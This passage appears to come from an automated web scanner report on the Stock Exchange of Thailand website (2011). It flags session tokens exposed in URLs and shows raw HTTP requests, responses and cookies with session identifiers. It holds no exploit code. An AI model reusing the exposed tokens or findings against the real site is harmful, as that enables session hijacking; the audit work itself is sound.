Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:55 GMT
Server: Apache-Coyote/1.1
ETag: W/"333-1295397880000"
Last-Modified: Wed, 19 Jan 2011 00:44:40 GMT
Content-Type: text/javascript
Content-Length: 333

function doClear(theText) {
if (theText.value == theText.defaultValue){
theText.value = "";
}
}
function alertWindow(url){
   aWindow = window.open(url,'symbolWindow', 'scrollba
...[SNIP]...

12.47. http://www.set.or.th/set/oppdaybyperiod.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/oppdaybyperiod.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=884D2D7AB4DAC6D78614FFFB7A7D8586; Path=/set
Content-Length: 118042


<html>
<head>
<link href="/set/styles/setstyle.css;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
...[SNIP]...
rket, equity, bond, derivatives, stock market, quotes, financial, internet trading, listed companies, IPO, rules & regulations, broker, market data, investment information, news, investor education">
<script language=javascript src="/set/javascripts/javascript.js;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></script>
...[SNIP]...
<td><img height="10" width="50" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></td>
...[SNIP]...
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="9" height="1"></td>
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="175" height="1"></td>
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="6" height="1"></td>
...[SNIP]...
<td colspan="3"><img src="/set/images/leftbox-top.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="190" height="9"></td>
...[SNIP]...
<td><img height="10" width="50" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></td>
...[SNIP]...
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="1" height="1"></td>
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"height="1" width="613"></td>
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="1" height="1"></td>
...[SNIP]...
<td><img src="/set/images/middlebox-topleft.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="10" height="31"></td>
...[SNIP]...
<td width="100%" background="/set/images/middlebox-bgtop.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="1" height="1"></td>
...[SNIP]...
<td><img src="/set/images/middlebox-topright.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="10" height="31"></td>
...[SNIP]...
<div class="webonly"><img height="1" width="1" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></div>
...[SNIP]...
<td height="30"><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="10" height="1"></td>
...[SNIP]...
<td><img src="/set/images/button-orange.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="23" height="23"></td>
...[SNIP]...
<td width="100%"><img height="1" width="1" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586">
<div class="webonly">
...[SNIP]...
<a href="javascript:printWindow()" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image125','','/set/images/icon-print-en02.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586',1)"><img src="/set/images/icon-print-en01.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" name="Image125" width="59" height="22" border="0"></a>
...[SNIP]...
%3A%2F%2Fwww.set.or.th%2Fset%2Foppdaybyperiod.do" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image124','','/set/images/icon-thai02.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586',1)"><img src="/set/images/icon-thai01.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" name="Image124" width="57" height="22" border="0"></a>
...[SNIP]...
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="10" height="1"></td>
...[SNIP]...
<td colspan="3" class="yellowline"><img height="3" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="1"></td>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=384"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=406"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=371"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=376"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=374"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=412"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=391"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=422"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=397"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=396"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=421"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=441"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=424"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=445"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=430"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=386"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=442"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=429"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=420"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemand.php?onid=448"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=408"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=383"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=415"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=425"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=440"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=407"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=431"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=387"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=377"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=428"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=379"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=392"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=410"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=447"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=418"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=395"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=375"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=439"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=438"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=413"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=365"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=380"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=405"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=417"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=443"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=411"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=434"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=409"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=433"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=388"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=364"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=370"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=366"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=446"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=385"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=414"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=382"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=416"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=399"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=435"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=432"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=393"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=436"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=372"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=381"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=401"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=437"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=400"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=378"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" ></a>
...[SNIP]...
<td bgcolor="#c2c2c2"><img height="1" width="1" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></td>
...[SNIP]...
<td><img src="/set/images/middlebox-bottomleft.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="10" height="14"></td>
...[SNIP]...
<td width="100%" background="/set/images/middlebox-bottom-bg.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="1" height="1"></td>
...[SNIP]...
<td><img src="/set/images/middlebox-bottomright.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="10" height="14"></td>
...[SNIP]...
<td><img height="10" width="50" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></td>
...[SNIP]...
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="3" height="1"></td>
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="179" height="1"></td>
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="13" height="1"></td>
...[SNIP]...
<td colspan="3"><img src="/set/images/rightbox-top.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="195" height="10"></td>
...[SNIP]...
<td><img height="20" src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586"></td>
...[SNIP]...
<div align="center">


   <img src="/set/images/rss.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" border="0"><a class="greylink" href="http://www.set.or.th/en/rss/rss_p1.html" target="_parent">
...[SNIP]...
<td class="copyright" align="center" nowrap>For more information, please contact S-E-T Call Center Tel. 0-2229-2222 E-mail :
<img src="/set/images/email-setcallcenter.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="120" height="15"></td>
...[SNIP]...
<td><img src="/set/images/spacer.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" width="1" height="5"></td>
...[SNIP]...

12.48. http://www.set.or.th/set/styles/setstyle.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /set/styles/setstyle.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /set/styles/setstyle.css;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51 HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=975

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:56 GMT
Server: Apache-Coyote/1.1
ETag: W/"14950-1295397888000"
Last-Modified: Wed, 19 Jan 2011 00:44:48 GMT
Content-Type: text/css
Content-Length: 14950

table {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC, CordiaUPC; COLOR: #000000; TEXT-DECORATION: none}
body {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Ver
...[SNIP]...

12.49. http://www.set.or.th/static/news/latestnews_en_US.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /static/news/latestnews_en_US.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /static/news/latestnews_en_US.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=12

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:14 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:48:00 GMT
ETag: "900fc-21ae-63650400"
Accept-Ranges: bytes
Content-Length: 8622
Content-Type: text/html


<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">

...[SNIP]...
</a>
<a href="/set/todaynews.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?language=en&country=US" target="_parent">News Today</a> |
<a href="/set/newslistinput.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?language=en&country=US" target="_parent">News Archive</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?type=R&amp;time=1304426269000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490383E.txt&amp;source=SET&amp;headline=SET+News+%3AThai+bourse+launches+%22Financial++Freedom+Academy+Project%22+on+www.settrade.com&amp;symbol=SET&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET News :Thai bourse launches &#034;Financial Freedom Academy Project&#034; on www.settrade.com</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?type=R&amp;time=1304426046000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060032E.txt&amp;source=SET&amp;headline=SET+News+%3AThai+bourse+to+promote+brokerage+firms%27+full+range+of+services&amp;symbol=SET&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET News :Thai bourse to promote brokerage firms&#039; full range of services</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?type=R&amp;time=1304421379000&amp;filename=dat%2Fprsnews%2Fnews%2F8000NWS030520111816190619E.txt&amp;source=mai&amp;headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&amp;symbol=mai&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET removes causes of possible delisting of EARTH &amp; resumes trading on mai from May 18, 11 onwards</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=A31E99841B3B05DFCE544FF26ABE3935?type=R&amp;time=1304421379000&amp;filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111816190665E.txt&amp;source=SET&amp;headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&amp;symbol=SET&amp;language=en&amp;country=US" target="_blank" class="indexleft">SET removes causes of possible delisting of EARTH &amp; resumes trading on mai from May 18, 11 onwards</a>
...[SNIP]...
